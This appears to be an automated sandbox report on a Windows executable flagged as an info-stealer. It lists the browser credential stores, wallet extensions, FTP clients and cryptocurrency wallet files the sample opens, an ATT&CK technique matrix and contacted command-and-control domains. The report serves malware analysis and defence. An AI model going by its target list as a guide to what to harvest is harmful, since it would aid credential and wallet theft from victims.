      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeDirectory queried: C:\Users\user\DocumentsJump to behavior

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000000.00000003.1547321382.0000000003431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
      Windows Management Instrumentation
      1
      DLL Side-Loading
      1
      DLL Side-Loading
      21
      Virtualization/Sandbox Evasion
      2
      OS Credential Dumping
      2
      System Time Discovery
      Remote Services1
      Archive Collected Data
      21
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts2
      Command and Scripting Interpreter
      Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Disable or Modify Tools
      LSASS Memory251
      Security Software Discovery
      Remote Desktop Protocol31
      Data from Local System
      1
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Native API
      Logon Script (Windows)Logon Script (Windows)1
      Deobfuscate/Decode Files or Information
      Security Account Manager21
      Virtualization/Sandbox Evasion
      SMB/Windows Admin Shares2
      Clipboard Data
      2
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
      Obfuscated Files or Information
      NTDS1
      Process Discovery
      Distributed Component Object ModelInput Capture113
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading
      LSA Secrets1
      Account Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
      System Owner/User Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
      System Network Configuration Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem12
      File and Directory Discovery
      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow35
      System Information Discovery
      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      1st.Setup_patched.exe8%ReversingLabs
      1st.Setup_patched.exe8%VirustotalBrowse
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://winetersgard.digital:443/agbbBXH0%Avira URL Cloudsafe
      https://winetersgard.digital/agbb93=0%Avira URL Cloudsafe
      https://winetersgard.digital/agbb=0%Avira URL Cloudsafe
      https://winetersgard.digital/Z0%Avira URL Cloudsafe
      https://winetersgard.digital/agbbr0%Avira URL Cloudsafe
      https://winetersgard.digital/agbb70%Avira URL Cloudsafe
      https://winetersgard.digital/agbbP80%Avira URL Cloudsafe
      https://psi.secunia.com/0%Avira URL Cloudsafe
      https://winetersgard.digital/agbbs0%Avira URL Cloudsafe
      https://psi3.s0%Avira URL Cloudsafe
      https://winetersgard.digital/W0%Avira URL Cloudsafe
      https://winetersgard.digital/agbbw0%Avira URL Cloudsafe
      winetersgard.digital/agbb0%Avira URL Cloudsafe
      https://winetersgard.digital/t0%Avira URL Cloudsafe
      https://winetersgard.digital/0%Avira URL Cloudsafe
      https://winetersgard.digital/s0%Avira URL Cloudsafe
      https://winetersgard.digital/agbb0%Avira URL Cloudsafe
      https://winetersgard.digital/agbb/0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      winetersgard.digital
      104.21.13.126
      truetrue
        unknown
        NameMaliciousAntivirus DetectionReputation
        jawdedmirror.run/ewqdfalse
          high
          nighetwhisper.top/lekdfalse
            high
            changeaie.top/gepsfalse
              high
              owlflright.digital/qopyfalse
                high
                zestmodp.top/zedafalse
                  high
                  liftally.top/xasjfalse
                    high
                    salaccgfa.top/gsoozfalse
                      high
                      winetersgard.digital/agbbtrue
                      • Avira URL Cloud: safe
                      unknown
                      lonfgshadow.live/xawifalse
                        high
                        https://winetersgard.digital/agbbfalse
                        • Avira URL Cloud: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://duckduckgo.com/ac/?q=1st.Setup_patched.exe, 00000000.00000003.1420807375.0000000004140000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=1st.Setup_patched.exe, 00000000.00000003.1420807375.0000000004140000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://winetersgard.digital/agbb=1st.Setup_patched.exe, 00000000.00000003.1443882229.000000000177C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://winetersgard.digital/agbbP81st.Setup_patched.exe, 00000000.00000003.1509169903.00000000016F3000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg1st.Setup_patched.exe, 00000000.00000003.1458946387.0000000001781000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://psi.secunia.com/1st.Setup_patched.exefalse
                              • Avira URL Cloud: safe
                              unknown
                              https://winetersgard.digital/agbb71st.Setup_patched.exe, 00000000.00000003.1474118245.000000000177B000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1456572225.000000000177B000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://www.google.com/images/branding/product/ico/googleg_alldp.ico1st.Setup_patched.exe, 00000000.00000003.1420807375.0000000004140000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://winetersgard.digital/agbbr1st.Setup_patched.exe, 00000000.00000003.1474118245.000000000177B000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://winetersgard.digital/agbbs1st.Setup_patched.exe, 00000000.00000002.1548173492.0000000001702000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1547105385.0000000001700000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1509985705.000000000177B000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1547005847.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1509779804.000000000177A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://winetersgard.digital/agbb93=1st.Setup_patched.exe, 00000000.00000003.1535126994.000000000177A000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1518040299.000000000177A000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1547147907.000000000177E000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1537648643.000000000177B000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://x1.c.lencr.org/01st.Setup_patched.exe, 00000000.00000003.1457208726.00000000041DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://x1.i.lencr.org/01st.Setup_patched.exe, 00000000.00000003.1457208726.00000000041DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search1st.Setup_patched.exe, 00000000.00000003.1420807375.0000000004140000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://support.mozilla.org/products/firefoxgro.all1st.Setup_patched.exe, 00000000.00000003.1458546143.000000000423A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://www.mozilla.or1st.Setup_patched.exe, 00000000.00000003.1458449731.000000000411C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://winetersgard.digital:443/agbbBXH1st.Setup_patched.exe, 00000000.00000003.1496368069.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000002.1548136991.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1509169903.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1536407443.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1547005847.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1495829178.00000000016F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://psi3.secunia.com/psi/30011/1st.Setup_patched.exefalse
                                            high
                                            https://psi3.s1st.Setup_patched.exefalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.1st.Setup_patched.exe, 00000000.00000003.1458946387.0000000001781000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi1st.Setup_patched.exe, 00000000.00000003.1458946387.0000000001781000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://winetersgard.digital/Z1st.Setup_patched.exe, 00000000.00000003.1546842987.000000000174A000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000002.1548204868.000000000174A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://duckduckgo.com/chrome_newtabv20-1st.Setup_patched.exe, 00000000.00000003.1420807375.0000000004140000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://winetersgard.digital/W1st.Setup_patched.exe, 00000000.00000003.1518040299.000000000174A000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1546842987.000000000174A000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000002.1548204868.000000000174A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=1st.Setup_patched.exe, 00000000.00000003.1420807375.0000000004140000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://crl.rootca1.amazontrust.com/rootca1.crl01st.Setup_patched.exe, 00000000.00000003.1457208726.00000000041DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://ac.ecosia.org?q=1st.Setup_patched.exe, 00000000.00000003.1420807375.0000000004140000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://ocsp.rootca1.amazontrust.com0:1st.Setup_patched.exe, 00000000.00000003.1457208726.00000000041DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br1st.Setup_patched.exe, 00000000.00000003.1458546143.000000000423A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_1st.Setup_patched.exe, 00000000.00000003.1458946387.0000000001781000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://psi3.secunia.com/1st.Setup_patched.exefalse
                                                                high
                                                                https://winetersgard.digital/agbbw1st.Setup_patched.exe, 00000000.00000003.1518040299.000000000174A000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1546842987.000000000174A000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000002.1548204868.000000000174A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://winetersgard.digital/s1st.Setup_patched.exe, 00000000.00000003.1518040299.000000000174A000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1546842987.000000000174A000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000002.1548204868.000000000174A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://winetersgard.digital/1st.Setup_patched.exe, 00000000.00000003.1546842987.000000000174A000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000002.1548204868.000000000174A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://winetersgard.digital/t1st.Setup_patched.exe, 00000000.00000003.1546842987.000000000174A000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000002.1548204868.000000000174A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://www.ecosia.org/newtab/v201st.Setup_patched.exe, 00000000.00000003.1420807375.0000000004140000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://winetersgard.digital/agbb/1st.Setup_patched.exe, 00000000.00000003.1518040299.000000000174A000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1546842987.000000000174A000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000002.1548204868.000000000174A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://psi3.secunia.com/psi/30011/index.htmlSecunia1st.Setup_patched.exefalse
                                                                    high
                                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?1st.Setup_patched.exe, 00000000.00000003.1457208726.00000000041DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=1st.Setup_patched.exe, 00000000.00000003.1420807375.0000000004140000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://gemini.google.com/app?q=1st.Setup_patched.exe, 00000000.00000003.1420807375.0000000004140000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          104.21.13.126
                                                                          winetersgard.digitalUnited States
                                                                          13335CLOUDFLARENETUStrue
                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                          Analysis ID:1664108
                                                                          Start date and time:2025-04-13 17:05:15 +02:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 5m 34s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:12
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:1st.Setup_patched.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.spyw.evad.winEXE@1/0@2/1
                                                                          EGA Information:
                                                                          • Successful, ratio: 100%
                                                                          HCA Information:
                                                                          • Successful, ratio: 79%
                                                                          • Number of executed functions: 31
                                                                          • Number of non-executed functions: 280
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                          • Excluded IPs from analysis (whitelisted): 23.76.34.6, 172.202.163.200
                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          TimeTypeDescription
                                                                          11:06:28API Interceptor7x Sleep call for process: 1st.Setup_patched.exe modified
                                                                          No context
                                                                          No context
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          CLOUDFLARENETUSSetup_patched.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 104.21.80.1
                                                                          #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 172.67.157.7
                                                                          https://onlyfans.com/bigmouthxfreeGet hashmaliciousUnknownBrowse
                                                                          • 172.66.0.44
                                                                          Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 104.21.5.162
                                                                          Set-Up.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 172.67.131.70
                                                                          shegivenmekissinglips.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                          • 104.21.32.1
                                                                          smss (2).exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                          • 104.21.96.1
                                                                          KUzGUp4xs6.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                          • 104.21.32.1
                                                                          Mi5cEY8M3R.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                          • 104.21.48.1
                                                                          6pCmlKafCF.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                          • 104.21.48.1
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          a0e9f5d64349fb13191bc781f81f42e1Setup_patched.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 104.21.13.126
                                                                          #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 104.21.13.126
                                                                          Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 104.21.13.126
                                                                          Set-Up.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 104.21.13.126
                                                                          activate.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 104.21.13.126
                                                                          activate.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 104.21.13.126
                                                                          OGF4TzdXZ9.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 104.21.13.126
